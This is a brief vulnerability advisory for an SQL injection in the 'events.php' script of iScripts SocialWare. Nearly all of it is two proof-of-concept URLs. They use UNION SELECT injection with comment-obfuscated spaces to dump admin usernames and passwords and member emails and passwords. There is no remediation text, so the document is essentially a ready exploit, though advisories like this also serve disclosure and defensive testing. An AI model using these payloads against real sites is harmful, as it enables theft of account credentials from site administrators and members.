iScripts SocialWare 'events.php' SQL Injection Vulnerability

iScripts SocialWare 'events.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://www.example.com/events.php?action=show&id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3c666f6e7420636f6c6f723d22726564223e,Username,char(58),Password,0x3c2f666f6e743e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/**/FROM/**/admin_users/*
http://www.example.com/events.php?action=show&id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3c666f6e7420636f6c6f723d22726564223e,email,char(58),password,0x3c2f666f6e743e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/**/FROM/**/members/*